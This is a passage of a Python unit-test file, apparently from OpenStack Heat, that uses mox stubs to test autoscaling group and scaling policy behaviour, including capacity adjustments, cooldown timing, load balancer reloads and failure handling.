self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.assertEqual(rsrc.state, (rsrc.CREATE, rsrc.COMPLETE))
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(instance.Instance, 'handle_resume')
self.m.StubOutWithMock(instance.Instance, 'check_resume_complete')
instance.Instance.handle_resume().AndRaise(Exception('oops'))
self.m.ReplayAll()
rsrc.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
for i in rsrc.nested().resources.values():
i.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
sus_task = scheduler.TaskRunner(rsrc.resume)
self.assertRaises(exception.ResourceFailure, sus_task, ())
self.assertEqual(rsrc.state, (rsrc.RESUME, rsrc.FAILED))
self.assertEqual(rsrc.status_reason,
'Error: Resource resume failed: Exception: oops')
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_create_error(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_validate()
self.m.StubOutWithMock(instance.Instance, 'handle_create')
self.m.StubOutWithMock(instance.Instance, 'check_create_complete')
instance.Instance.handle_create().AndRaise(Exception)
self.m.ReplayAll()
conf = stack.resources['LaunchConfig']
self.assertEqual(None, conf.validate())
scheduler.TaskRunner(conf.create)()
self.assertEqual((conf.CREATE, conf.COMPLETE), conf.state)
rsrc = stack.resources['WebServerGroup']
self.assertEqual(None, rsrc.validate())
self.assertRaises(exception.ResourceFailure,
scheduler.TaskRunner(rsrc.create))
self.assertEqual((rsrc.CREATE, rsrc.FAILED), rsrc.state)
self.assertEqual([], rsrc.get_instance_names())
self.m.VerifyAll()
def test_scaling_group_update_ok_maxsize(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '3'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Reduce the max size to 2, should complete without adjusting
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['MaxSize'] = '2'
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.assertEqual('2', rsrc.properties['MaxSize'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_minsize(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '3'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Increase min size to 2, should trigger an ExactCapacity adjust
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(1)
self.m.ReplayAll()
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['MinSize'] = '2'
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
self.assertEqual('2', rsrc.properties['MinSize'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_desired(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '3'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Increase min size to 2 via DesiredCapacity, should adjust
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(1)
self.m.ReplayAll()
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['DesiredCapacity'] = '2'
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
self.assertEqual('2', rsrc.properties['DesiredCapacity'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_desired_remove(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Remove DesiredCapacity from the updated template, which should
# have no effect, it's an optional parameter
update_snippet = copy.deepcopy(rsrc.parsed_template())
del(update_snippet['Properties']['DesiredCapacity'])
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
self.assertEqual(None, rsrc.properties['DesiredCapacity'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_cooldown(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['Cooldown'] = '60'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['Cooldown'] = '61'
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual('61', rsrc.properties['Cooldown'])
rsrc.delete()
self.m.VerifyAll()
def test_lb_reload_static_resolve(self):
t = template_format.parse(as_template)
properties = t['Resources']['ElasticLoadBalancer']['Properties']
properties['AvailabilityZones'] = {'Fn::GetAZs': ''}
self.m.StubOutWithMock(parser.Stack, 'get_availability_zones')
parser.Stack.get_availability_zones().MultipleTimes().AndReturn(
['abc', 'xyz'])
# Check that the Fn::GetAZs is correctly resolved
expected = {u'Type': u'AWS::ElasticLoadBalancing::LoadBalancer',
u'Properties': {'Instances': ['WebServerGroup-0'],
u'Listeners': [{u'InstancePort': u'80',
u'LoadBalancerPort': u'80',
u'Protocol': u'HTTP'}],
u'AvailabilityZones': ['abc', 'xyz']}}
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
stack = utils.parse_stack(t, params=self.params)
lb = stack['ElasticLoadBalancer']
self.m.StubOutWithMock(lb, 'handle_update')
lb.handle_update(expected,
mox.IgnoreArg(),
mox.IgnoreArg()).AndReturn(None)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['Cooldown'] = '61'
scheduler.TaskRunner(rsrc.update, update_snippet)()
rsrc.delete()
self.m.VerifyAll()
@skipIf(neutronclient is None, 'neutronclient unavailable')
def test_lb_reload_members(self):
t = template_format.parse(as_template)
t['Resources']['ElasticLoadBalancer'] = {
'Type': 'OS::Neutron::LoadBalancer',
'Properties': {
'protocol_port': 8080,
'pool_id': 'pool123'
}
}
expected = {
'Type': 'OS::Neutron::LoadBalancer',
'Properties': {
'protocol_port': 8080,
'pool_id': 'pool123',
'members': [u'WebServerGroup-0']}
}
self.m.StubOutWithMock(neutron_lb.LoadBalancer, 'handle_update')
neutron_lb.LoadBalancer.handle_update(expected,
mox.IgnoreArg(),
mox.IgnoreArg()).AndReturn(None)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
stack = utils.parse_stack(t, params=self.params)
self.create_scaling_group(t, stack, 'WebServerGroup')
self.m.VerifyAll()
@skipIf(neutronclient is None, 'neutronclient unavailable')
def test_lb_reload_invalid_resource(self):
t = template_format.parse(as_template)
t['Resources']['ElasticLoadBalancer'] = {
'Type': 'AWS::EC2::Volume',
'Properties': {
'AvailabilityZone': 'nova'
}
}
self._stub_create(1)
self.m.ReplayAll()
stack = utils.parse_stack(t, params=self.params)
error = self.assertRaises(
exception.ResourceFailure,
self.create_scaling_group, t, stack, 'WebServerGroup')
self.assertEqual(
"Error: Unsupported resource 'ElasticLoadBalancer' in "
"LoadBalancerNames",
str(error))
self.m.VerifyAll()
def test_scaling_group_adjust(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# start with 3
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '3'
self._stub_lb_reload(3)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 3')
self._stub_create(3)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
# reduce to 1
self._stub_lb_reload(1)
self._stub_validate()
self._stub_meta_expected(now, 'ChangeInCapacity : -2')
self.m.ReplayAll()
rsrc.adjust(-2)
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# raise to 3
self._stub_lb_reload(3)
self._stub_meta_expected(now, 'ChangeInCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc.adjust(2)
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
# set to 2
self._stub_lb_reload(2)
self._stub_validate()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self.m.ReplayAll()
rsrc.adjust(2, 'ExactCapacity')
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
self.m.VerifyAll()
def test_scaling_group_scale_up_failure(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.m.VerifyAll()
self.m.UnsetStubs()
# Scale up one 1 instance with resource failure
self.m.StubOutWithMock(instance.Instance, 'handle_create')
instance.Instance.handle_create().AndRaise(exception.Error())
self._stub_lb_reload(1, unset=False, nochange=True)
self._stub_validate()
self.m.ReplayAll()
self.assertRaises(exception.Error, rsrc.adjust, 1)
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.m.VerifyAll()
def test_scaling_group_nochange(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# raise above the max
rsrc.adjust(4)
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# lower below the min
rsrc.adjust(-2)
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# no change
rsrc.adjust(0)
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_percent(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
self._stub_lb_reload(2)
self._stub_create(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# reduce by 50%
self._stub_lb_reload(1)
self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
self._stub_validate()
self.m.ReplayAll()
rsrc.adjust(-50, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0'],
rsrc.get_instance_names())
# raise by 200%
self._stub_lb_reload(3)
self._stub_meta_expected(now, 'PercentChangeInCapacity : 200')
self._stub_create(2)
self.m.ReplayAll()
rsrc.adjust(200, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
rsrc.delete()
def test_scaling_group_cooldown_toosoon(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances, Cooldown 60s
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
properties['Cooldown'] = '60'
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# reduce by 50%
self._stub_lb_reload(1)
self._stub_validate()
self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
self.m.ReplayAll()
rsrc.adjust(-50, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0'],
rsrc.get_instance_names())
# Now move time on 10 seconds - Cooldown in template is 60
# so this should not update the policy metadata, and the
# scaling group instances should be unchanged
# Note we have to stub Metadata.__get__ since up_policy isn't
# stored in the DB (because the stack hasn't really been created)
previous_meta = {timeutils.strtime(now):
'PercentChangeInCapacity : -50'}
self.m.VerifyAll()
self.m.UnsetStubs()
now = now + datetime.timedelta(seconds=10)
self.m.StubOutWithMock(timeutils, 'utcnow')
timeutils.utcnow().MultipleTimes().AndReturn(now)
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
self.m.ReplayAll()
# raise by 200%, too soon for Cooldown so there should be no change
rsrc.adjust(200, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
rsrc.delete()
def test_scaling_group_cooldown_ok(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances, Cooldown 60s
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
properties['Cooldown'] = '60'
self._stub_lb_reload(2)
self._stub_create(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# reduce by 50%
self._stub_lb_reload(1)
self._stub_validate()
self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
self.m.ReplayAll()
rsrc.adjust(-50, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0'],
rsrc.get_instance_names())
# Now move time on 61 seconds - Cooldown in template is 60
# so this should update the policy metadata, and the
# scaling group instances updated
previous_meta = {timeutils.strtime(now):
'PercentChangeInCapacity : -50'}
self.m.VerifyAll()
self.m.UnsetStubs()
now = now + datetime.timedelta(seconds=61)
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
#stub for the metadata accesses while creating the two instances
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
# raise by 200%, should work
self._stub_lb_reload(3, unset=False)
self._stub_create(2)
self._stub_meta_expected(now, 'PercentChangeInCapacity : 200')
self.m.ReplayAll()
rsrc.adjust(200, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
rsrc.delete()
def test_scaling_group_cooldown_zero(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances, Cooldown 0
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
properties['Cooldown'] = '0'
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# reduce by 50%
self._stub_lb_reload(1)
self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
self._stub_validate()
self.m.ReplayAll()
rsrc.adjust(-50, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0'],
rsrc.get_instance_names())
# Don't move time, since cooldown is zero, it should work
previous_meta = {timeutils.strtime(now):
'PercentChangeInCapacity : -50'}
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
#stub for the metadata accesses while creating the two instances
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
# raise by 200%, should work
self._stub_lb_reload(3, unset=False)
self._stub_meta_expected(now, 'PercentChangeInCapacity : 200')
self._stub_create(2)
self.m.ReplayAll()
rsrc.adjust(200, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_up(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
alarm_url = up_policy.FnGetAtt('AlarmUrl')
self.assertNotEqual(None, alarm_url)
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_down(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Scale down one
self._stub_lb_reload(1)
self._stub_validate()
self._stub_meta_expected(now, 'ChangeInCapacity : -1', 2)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
down_policy = self.create_scaling_policy(t, stack,
'WebServerScaleDownPolicy')
down_policy.signal()
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_cooldown_toosoon(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Now move time on 10 seconds - Cooldown in template is 60
# so this should not update the policy metadata, and the
# scaling group instances should be unchanged
# Note we have to stub Metadata.__get__ since up_policy isn't
# stored in the DB (because the stack hasn't really been created)
previous_meta = {timeutils.strtime(now): 'ChangeInCapacity : 1'}
self.m.VerifyAll()
self.m.UnsetStubs()
now = now + datetime.timedelta(seconds=10)
self.m.StubOutWithMock(timeutils, 'utcnow')
timeutils.utcnow().MultipleTimes().AndReturn(now)
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), up_policy, mox.IgnoreArg()
).AndReturn(previous_meta)
self.m.ReplayAll()
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_cooldown_ok(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Now move time on 61 seconds - Cooldown in template is 60
# so this should trigger a scale-up
previous_meta = {timeutils.strtime(now): 'ChangeInCapacity : 1'}
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), up_policy, mox.IgnoreArg()
).AndReturn(previous_meta)
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
#stub for the metadata accesses while creating the additional instance
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
now = now + datetime.timedelta(seconds=61)
self._stub_lb_reload(3, unset=False)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.ReplayAll()
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_cooldown_zero(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Create the scaling policy (with Cooldown=0) and scale up one
properties = t['Resources']['WebServerScaleUpPolicy']['Properties']
properties['Cooldown'] = '0'
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Now trigger another scale-up without changing time, should work
previous_meta = {timeutils.strtime(now): 'ChangeInCapacity : 1'}
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), up_policy, mox.IgnoreArg()
).AndReturn(previous_meta)
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
#stub for the metadata accesses while creating the additional instance
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
self._stub_lb_reload(3, unset=False)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.ReplayAll()
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_cooldown_none(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Create the scaling policy no Cooldown property, should behave the
# same as when Cooldown==0
properties = t['Resources']['WebServerScaleUpPolicy']['Properties']
del(properties['Cooldown'])
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Now trigger another scale-up without changing time, should work
previous_meta = {timeutils.strtime(now): 'ChangeInCapacity : 1'}
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), up_policy, mox.IgnoreArg()
).AndReturn(previous_meta)
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
#stub for the metadata accesses while creating the addtional instance
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
self._stub_lb_reload(3, unset=False)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.ReplayAll()
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_update(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Create initial scaling policy
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
# Trigger alarm
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Update scaling policy
update_snippet = copy.deepcopy(up_policy.parsed_template())
update_snippet['Properties']['ScalingAdjustment'] = '2'
scheduler.TaskRunner(up_policy.update, update_snippet)()
self.assertEqual('2',
up_policy.properties['ScalingAdjustment'])
# Now move time on 61 seconds - Cooldown in template is 60
# so this should trigger a scale-up
previous_meta = {timeutils.strtime(now): 'ChangeInCapacity : 1'}
self.m.VerifyAll()
